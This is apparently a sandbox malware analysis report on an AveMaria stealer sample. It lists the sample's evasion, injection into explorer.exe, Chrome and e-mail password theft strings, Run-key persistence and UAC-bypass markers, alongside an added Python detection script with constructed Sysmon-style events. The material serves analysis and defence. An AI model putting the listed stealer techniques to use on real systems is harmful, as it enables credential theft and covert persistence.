Source: C:\Users\user\Desktop\4ifN8B061M.exe TID: 3560 | Thread sleep count: 56 > 30
Source: C:\Users\user\Desktop\4ifN8B061M.exe TID: 3432 | Thread sleep time: -1000000s >= -30000s
Source: C:\ProgramData\images.exe TID: 3568 | Thread sleep count: 41 > 30
Source: C:\ProgramData\images.exe TID: 3568 | Thread sleep time: -41000000s >= -30000s
Source: C:\ProgramData\images.exe TID: 3324 | Thread sleep count: 51 > 30
Source: C:\ProgramData\images.exe TID: 3568 | Thread sleep time: -1000000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\ProgramData\images.exe | Last function: Thread delayed
Source: C:\ProgramData\images.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E879D FindFirstFileExA | 0_2_012E879D
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00258A9C GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA | 0_2_00258A9C
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025DEC5 FindFirstFileW,FindNextFileW | 0_2_0025DEC5
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC879D FindFirstFileExA | 3_2_00CC879D
Source: C:\ProgramData\images.exe | Code function: 3_2_0043DEC5 FindFirstFileW,FindNextFileW | 3_2_0043DEC5
Source: C:\ProgramData\images.exe | Code function: 3_2_00438A9C GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA | 3_2_00438A9C
Contains functionality to query local drives
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025DFC9 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW | 0_2_0025DFC9
Program exit points
Source: C:\Users\user\Desktop\4ifN8B061M.exe | API call chain: ExitProcess graph end node | graph_0-27859
Source: C:\ProgramData\images.exe | API call chain: ExitProcess graph end node | graph_3-27672

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E1817 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_012E1817
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025582B LoadLibraryA,GetProcAddress,ExitProcess | 0_2_0025582B
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E943A mov eax, dword ptr fs:[00000030h] | 0_2_012E943A
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E528C mov eax, dword ptr fs:[00000030h] | 0_2_012E528C
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025E8EC mov eax, dword ptr fs:[00000030h] | 0_2_0025E8EC
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025E5B7 mov eax, dword ptr fs:[00000030h] | 0_2_0025E5B7
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025E5BE mov eax, dword ptr fs:[00000030h] | 0_2_0025E5BE
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_00230467 mov eax, dword ptr fs:[00000030h] | 0_2_00230467
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_002454A9 mov eax, dword ptr fs:[00000030h] | 0_2_002454A9
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0023E22B mov eax, dword ptr fs:[00000030h] | 0_2_0023E22B
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0023DEF6 mov eax, dword ptr fs:[00000030h] | 0_2_0023DEF6
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0023DEFD mov eax, dword ptr fs:[00000030h] | 0_2_0023DEFD
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC943A mov eax, dword ptr fs:[00000030h] | 3_2_00CC943A
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC528C mov eax, dword ptr fs:[00000030h] | 3_2_00CC528C
Source: C:\ProgramData\images.exe | Code function: 3_2_0043E8EC mov eax, dword ptr fs:[00000030h] | 3_2_0043E8EC
Source: C:\ProgramData\images.exe | Code function: 3_2_0043E5B7 mov eax, dword ptr fs:[00000030h] | 3_2_0043E5B7
Source: C:\ProgramData\images.exe | Code function: 3_2_0043E5BE mov eax, dword ptr fs:[00000030h] | 3_2_0043E5BE
Source: C:\ProgramData\images.exe | Code function: 3_2_00410467 mov eax, dword ptr fs:[00000030h] | 3_2_00410467
Source: C:\ProgramData\images.exe | Code function: 3_2_004254A9 mov eax, dword ptr fs:[00000030h] | 3_2_004254A9
Source: C:\ProgramData\images.exe | Code function: 3_2_0041E22B mov eax, dword ptr fs:[00000030h] | 3_2_0041E22B
Source: C:\ProgramData\images.exe | Code function: 3_2_0041DEF6 mov eax, dword ptr fs:[00000030h] | 3_2_0041DEF6
Source: C:\ProgramData\images.exe | Code function: 3_2_0041DEFD mov eax, dword ptr fs:[00000030h] | 3_2_0041DEFD
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E9EC7 GetProcessHeap | 0_2_012E9EC7
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E19AA SetUnhandledExceptionFilter | 0_2_012E19AA
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E1817 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_012E1817
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E1C6F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_012E1C6F
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E5F98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_012E5F98
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC19AA SetUnhandledExceptionFilter | 3_2_00CC19AA
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC1C6F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_00CC1C6F
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC1817 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_00CC1817
Source: C:\ProgramData\images.exe | Code function: 3_2_00CC5F98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_00CC5F98

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025FD9E OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread | 0_2_0025FD9E
Source: C:\ProgramData\images.exe | Code function: 3_2_0043FD9E OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread | 3_2_0043FD9E
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe | 0_2_0025FE7E
Source: C:\ProgramData\images.exe | Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe | 3_2_0043FE7E
Contains functionality to add an ACL to a security descriptor
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025F6C1 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError | 0_2_0025F6C1
Contains functionality to create a new security descriptor
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_0025D508 AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid | 0_2_0025D508
May try to detect the Windows Explorer process (often used for injection)
Source: images.exe, 00000003.00000002.579104628.00DA0000.00000002.00000001.sdmp, images.exe, 00000004.00000002.579883636.00DA0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: images.exe, 00000003.00000002.579104628.00DA0000.00000002.00000001.sdmp, images.exe, 00000004.00000002.579883636.00DA0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: images.exe, 00000003.00000002.579104628.00DA0000.00000002.00000001.sdmp, images.exe, 00000004.00000002.579883636.00DA0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E1ABB cpuid | 0_2_012E1ABB
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: 0_2_012E1706 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,RtlQueryPerformanceCounter | 0_2_012E1706

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connections per server for Internet Explorer
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Stealing of Sensitive Information:

Yara detected AveMaria stealer
Source: Yara match | File source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: images.exe PID: 3596, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4ifN8B061M.exe PID: 3380, type: MEMORY
Source: Yara match | File source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: \Google\Chrome\User Data\Default\Login Data | 0_2_0025AFDF
Source: C:\ProgramData\images.exe | Code function: \Google\Chrome\User Data\Default\Login Data | 3_2_0043AFDF
Contains functionality to steal e-mail passwords
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: POP3 Password | 0_2_00258F40
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: SMTP Password | 0_2_00258F40
Source: C:\Users\user\Desktop\4ifN8B061M.exe | Code function: IMAP Password | 0_2_00258F40
Source: C:\ProgramData\images.exe | Code function: POP3 Password | 3_2_00438F40
Source: C:\ProgramData\images.exe | Code function: SMTP Password | 3_2_00438F40
Source: C:\ProgramData\images.exe | Code function: IMAP Password | 3_2_00438F40

Remote Access Functionality:

Yara detected AveMaria stealer
Source: Yara match | File source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: images.exe PID: 3596, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4ifN8B061M.exe PID: 3380, type: MEMORY
Source: Yara match | File source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE
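
The signatures above describe one chain: a PE dropped to C:\ProgramData, a Run value pointing at it, the dropped file executed, a remote thread into explorer.exe, and strings for hiding a logon account under Winlogon\SpecialAccounts\UserList. The detection logic below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It runs over constructed, simplified Sysmon-style records (event IDs 1, 8, 11 and 13 with a reduced field set) that are hand-written to mirror the report rather than captured from the run; the injection and hidden-account records stand for behaviour the report lists only as code functionality. The dropper and the file it drops are joined into one actor cluster, so findings on either are scored together, and a single Run entry from a user-writable path is deliberately below the reporting threshold.

```python
"""Drop / autostart / inject / hidden-account chain detection (added example, not report code)."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

Event = Dict[str, object]
Finding = Tuple[str, str, str]  # (rule name, actor image, evidence)

# Constructed records, not sandbox output. Field names follow Sysmon event IDs 1 (ProcessCreate),
# 8 (CreateRemoteThread), 11 (FileCreate), 13 (RegistryEvent value set). The last record is
# benign noise: a vendor installer registering an updater from Program Files; it must not fire.
EVENTS: List[Event] = [
    {"id": 11, "Image": r"C:\Users\user\Desktop\4ifN8B061M.exe",
     "TargetFilename": r"C:\ProgramData\images.exe"},
    {"id": 13, "Image": r"C:\Users\user\Desktop\4ifN8B061M.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Images",
     "Details": r"C:\ProgramData\images.exe"},
    {"id": 1, "Image": r"C:\ProgramData\images.exe",
     "ParentImage": r"C:\Users\user\Desktop\4ifN8B061M.exe"},
    {"id": 8, "SourceImage": r"C:\ProgramData\images.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"id": 13, "Image": r"C:\ProgramData\images.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\support",
     "Details": "DWORD (0x00000000)"},
    {"id": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "Details": r"C:\Program Files\Vendor\updater.exe"},
]

# Directories a standard user can write to; the report's drop and Run value both point here.
USER_WRITABLE = re.compile(r"^c:\\(programdata|users\\[^\\]+\\appdata)\\")
RUN_VALUE = re.compile(r"\\currentversion\\run\\[^\\]+$")
# Any value written under this key hides an account from the logon screen.
HIDDEN_ACCOUNT = re.compile(r"\\winlogon\\specialaccounts\\userlist\\")
INJECTION_TARGETS = {"explorer.exe", "svchost.exe"}


def _n(value: object) -> str:
    """Normalise a path or key for comparison: strip quotes, lower-case."""
    return str(value).strip('"').lower()


def findings(events: List[Event]) -> List[Finding]:
    """Apply the per-event rules in trace order and return (rule, actor, evidence) hits."""
    hits: List[Finding] = []
    dropped: Dict[str, str] = {}  # dropped file -> image that wrote it
    for ev in events:
        eid = ev["id"]
        if eid == 11:
            target, actor = _n(ev["TargetFilename"]), _n(ev["Image"])
            dropped[target] = actor
            if target.endswith(".exe") and USER_WRITABLE.match(target):
                hits.append(("pe_drop_user_writable", actor, target))
        elif eid == 13:
            key, actor, data = _n(ev["TargetObject"]), _n(ev["Image"]), _n(ev["Details"])
            if RUN_VALUE.search(key) and USER_WRITABLE.match(data):
                hits.append(("autostart_user_writable", actor, key))
            if HIDDEN_ACCOUNT.search(key):
                hits.append(("hidden_logon_account", actor, key))
        elif eid == 1:
            image = _n(ev["Image"])
            if image in dropped:  # executing a file this trace saw being written
                hits.append(("drop_and_execute", dropped[image], image))
        elif eid == 8:
            src, tgt = _n(ev["SourceImage"]), _n(ev["TargetImage"])
            if tgt.rsplit("\\", 1)[-1] in INJECTION_TARGETS and not src.startswith("c:\\windows\\"):
                hits.append(("remote_thread_into_shell", src, tgt))
    return hits


def actor_clusters(events: List[Event]) -> Dict[str, str]:
    """Map each image to a cluster root, joining a dropper with what it writes and spawns."""
    parent: Dict[str, str] = {}

    def find(x: str) -> str:  # union-find with path halving
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for ev in events:
        if ev["id"] == 11:
            parent[find(_n(ev["TargetFilename"]))] = find(_n(ev["Image"]))
        elif ev["id"] == 1 and "ParentImage" in ev:
            parent[find(_n(ev["Image"]))] = find(_n(ev["ParentImage"]))
    return {img: find(img) for img in list(parent)}


def suspicious_chains(events: List[Event], min_rules: int = 3) -> Dict[str, Set[str]]:
    """Group findings by actor cluster; keep clusters where >= min_rules distinct rules fired.

    A lone Run entry from ProgramData is common in installers and is not a verdict by itself;
    the combination with drop-and-execute, a remote thread into the shell and a hidden logon
    account is the behaviour this report documents.
    """
    clusters = actor_clusters(events)
    per_cluster: Dict[str, Set[str]] = defaultdict(set)
    for rule, actor, _ in findings(events):
        per_cluster[clusters.get(actor, actor)].add(rule)
    return {root: rules for root, rules in per_cluster.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    for root, rules in suspicious_chains(EVENTS).items():
        print(root, "->", ", ".join(sorted(rules)))
```

On the constructed trace the dropper's cluster collects all five rules and is reported; the first two records alone (drop plus Run value) stay below the threshold, and the vendor updater never produces a finding because its Run value points into Program Files.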

Malware Configuration

No configs have been found

Simulations

Behavior and APIs

Time | Type | Description
09:32:42 | API Interceptor | 23x Sleep call for process: 4ifN8B061M.exe modified
09:32:47 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Images C:\ProgramData\images.exe
09:33:42 | API Interceptor | 58x Sleep call for process: images.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
4ifN8B061M.exe | 48% | Virustotal |
4ifN8B061M.exe | 100% | Avira | TR/Crypt.Agent.yyhho
4ifN8B061M.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\ProgramData\images.exe | 100% | Avira | TR/Crypt.Agent.yyhho
C:\ProgramData\images.exe | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
3.2.images.exe.430000.1.unpack | 100% | Avira | TR/RedCap.ghjpt
0.2.4ifN8B061M.exe.250000.1.unpack | 100% | Avira | TR/RedCap.ghjpt

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | Virustotal |
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | Virustotal |
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0C | 0% | URL Reputation | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author | Strings
Note: every Codoso_Gh0st_1 hit listed here is on $x3 and $c1 only, i.e. the COM elevation moniker Elevation:Administrator!new:{CLSID}; that string is used by any UAC bypass that instantiates an auto-elevated COM object, so these hits corroborate the sample's UAC-bypass capability rather than attribute it to Codoso.
00000003.00000003.566547321.0012A000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000003.00000003.565700412.0013A000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x3bd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdc8:$c1: Elevation:Administrator!new:
  • 0x3bd0:$c1: Elevation:Administrator!new:
00000003.00000003.565700412.0013A000.00000004.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x3bd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdc8:$c1: Elevation:Administrator!new:
  • 0x3bd0:$c1: Elevation:Administrator!new:
00000003.00000002.577725352.00448000.00000002.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdf0:$c1: Elevation:Administrator!new:
00000003.00000002.577725352.00448000.00000002.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdf0:$c1: Elevation:Administrator!new:
00000000.00000002.424138873.00268000.00000002.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdf0:$c1: Elevation:Administrator!new:
00000000.00000002.424138873.00268000.00000002.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdf0:$c1: Elevation:Administrator!new:
00000000.00000002.424063177.00230000.00000040.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x1672f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x1672f:$c1: Elevation:Administrator!new:
00000000.00000002.424063177.00230000.00000040.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x1672f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x1672f:$c1: Elevation:Administrator!new:
00000000.00000002.424063177.00230000.00000040.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000003.00000002.577710609.00442000.00000002.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000003.00000003.567703677.0013A000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x3bd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdc8:$c1: Elevation:Administrator!new:
  • 0x3bd0:$c1: Elevation:Administrator!new:
00000003.00000003.567703677.0013A000.00000004.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x3bd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdc8:$c1: Elevation:Administrator!new:
  • 0x3bd0:$c1: Elevation:Administrator!new:
00000000.00000003.422033804.003DD000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x5998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x5998:$c1: Elevation:Administrator!new:
00000000.00000003.422033804.003DD000.00000004.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x5998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x5998:$c1: Elevation:Administrator!new:
00000000.00000003.422033804.003DD000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000000.00000003.422009641.003DA000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x8998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x8998:$c1: Elevation:Administrator!new:
00000000.00000003.422009641.003DA000.00000004.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x8998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x8998:$c1: Elevation:Administrator!new:
00000000.00000003.422009641.003DA000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000003.00000003.567782220.0012C000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000003.00000003.564800575.00130000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xadc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdbd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xadc8:$c1: Elevation:Administrator!new:
  • 0xdbd0:$c1: Elevation:Administrator!new:
00000003.00000003.564800575.00130000.00000004.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xadc8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdbd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xadc8:$c1: Elevation:Administrator!new:
  • 0xdbd0:$c1: Elevation:Administrator!new:
00000003.00000003.564800575.00130000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000003.00000002.577668662.00410000.00000040.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x1672f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x1672f:$c1: Elevation:Administrator!new:
00000003.00000002.577668662.00410000.00000040.00000001.sdmp | Codoso_Gh0st_1_RID2C2D | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x1672f:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x1672f:$c1: Elevation:Administrator!new:
                00000003.00000002.577668662.00410000.00000040.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                  00000000.00000002.424120535.00262000.00000002.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                    00000000.00000003.421973490.003CD000.00000004.00000001.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
                    • 0x36a8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                    • 0x15998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                    • 0x36a8:$c1: Elevation:Administrator!new:
                    • 0x15998:$c1: Elevation:Administrator!new:
                    00000000.00000003.421973490.003CD000.00000004.00000001.sdmpCodoso_Gh0st_1_RID2C2DDetects Codoso APT Gh0st MalwareFlorian Roth
                    • 0x36a8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                    • 0x15998:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                    • 0x36a8:$c1: Elevation:Administrator!new:
                    • 0x15998:$c1: Elevation:Administrator!new:
                    00000000.00000003.421973490.003CD000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                      Process Memory Space: images.exe PID: 3596JoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                        Process Memory Space: 4ifN8B061M.exe PID: 3380JoeSecurity_AveMariaYara detected AveMaria stealerJoe Security

                          Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.4ifN8B061M.exe.250000.1.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
• 0x161f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.4ifN8B061M.exe.250000.1.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
• 0x161f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
• 0x161f0:$c1: Elevation:Administrator!new:
0.2.4ifN8B061M.exe.250000.1.unpack | Codoso_Gh0st_2_RID2C2E | Detects Codoso APT Gh0st Malware | Florian Roth
